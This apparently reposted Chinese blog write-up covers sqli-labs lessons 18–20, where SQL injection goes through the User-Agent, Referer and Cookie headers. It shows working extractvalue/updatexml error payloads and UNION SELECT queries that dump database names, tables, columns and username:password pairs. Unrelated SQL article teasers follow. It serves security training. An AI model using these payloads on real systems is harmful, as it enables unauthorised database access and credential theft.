代码编织梦想

less18 基于错误的用户代理,头部POST注入

admin
admin
登入成功(进不去重置数据库)
显示如下
在这里插入图片描述
有user agent参数,可能存在注入点
在这里插入图片描述
显示版本号:
在这里插入图片描述
爆库:User-Agent:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
在这里插入图片描述
库名:
在这里插入图片描述

less19基于头部的RefererPOST报错注入

抓包
admin登陆什么也没有
在referer后加单引号有回显sql语法错误
然后就和 18一样了:Referer: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
爆库:
在这里插入图片描述

less20 基于错误的cookie头部POST注入

admin登陆:
在这里插入图片描述
本关登录成功后用户名会存储在cookie中,且通过该参数执行SQL语句

登录成功之后会设置里面的cookie 当二次刷新的时候 这时候会重新从里面取值弄,并且这次取值没有经过过滤 直接就是注入点 还是使用updatexml的函数进行报错

方法一:
cookie注入:uname=admin' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) #在这里插入图片描述

方法2:
cookie 后加单引号出现报错,说明cookie处存在注入点
在这里插入图片描述

'order by 3 --+ 	  // 回显正常
'order by 4 --+	      // 回显错误
                      //说明行数有3个,即3个显示位

在这里插入图片描述
爆库名:
在这里插入图片描述
之后就是爆表:

union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

爆字段:

union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

爆值:

union select 1,2,group_concat(username,0x3a,password) from users--+

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/weixin_45694388/article/details/110966688

mysql 账户 禁止/开启远程访问-爱代码爱编程

mysql 账户 禁止/开启远程访问 1、 禁用远程登录2、开启远程登录权限 1、 禁用远程登录 root账户一般用于服务器,且远程部署的项目一般在服务器上是明文显示连接本地的127.0.0.1,且由于在安装mysql时大多程序猿都喜欢默认,导致root账户权限很大,密码很少,风险很高,一般都选择将其禁止远程访问 use mysql; up

mysql:DDL语言(Data Definition Language)(数据定义语言)(数据库的操作)-爱代码爱编程

目录 DDL语言(Data Definition Language)(数据定义语言)(数据库的操作)库和表的管理★existe库的管理库的修改库的删除表的创建表的修改修改列名修改列的类型或约束添加新列删除列修改表名表的删除表的复制★类型和约束数值类型整形unisgned【无符号关键字】★zerofifill【零填充关键字】★小数使用原则★字符类型E

2020 一张图告诉你SQL使用inner join,left join 等 SQL join-爱代码爱编程

文末有数据库sql 环境:mysql5.* 时间:202012 文章目录 表数据SQL查询inner joinunionunion allleft joinIS NULLright joinis nullFULL OUTER JOINsql文件 表数据 新建了俩张表 SQL查询 inner join 求交集 SELECT *

SQL 预订座位-爱代码爱编程

元旦假期就快到了,计划出去玩的朋友,都订好票了么? 今天,我们用 SQL 模拟订座的场景。 seats 是座位预订表,表结构如下: CREATE TABLE `seats` ( `id` int unsigned NOT NULL AUTO_INCREMENT, `row_no` int DEFAULT NULL COMMENT '第几排',

数据库事务四大特性-爱代码爱编程

数据库事务是指作为单个逻辑工作单元执行的一系列操作,这些操作要么全做要么全不做,是一个不可分割的工作单位。 数据库事务的四大特性(简称ACID)是:(1) 原子性(Atomicity) 事务的原子性指的是,事务中包含的程序作为数据库的逻辑工作单位,它所做的对数据修改操作要么全部执行,要么完全不执行。这种特性称为原子性。 例如银行取款事务分为2个步骤(1)存

SQL踩坑集合,持续更新……-爱代码爱编程

1.oracle中null数据的计算 select count(*) from pier.testxhh t where t.name != 'a';//结果 0 select count(*) from pier.testxhh t where t.name = 'a';// 结果 1 select count(*) from pier.testx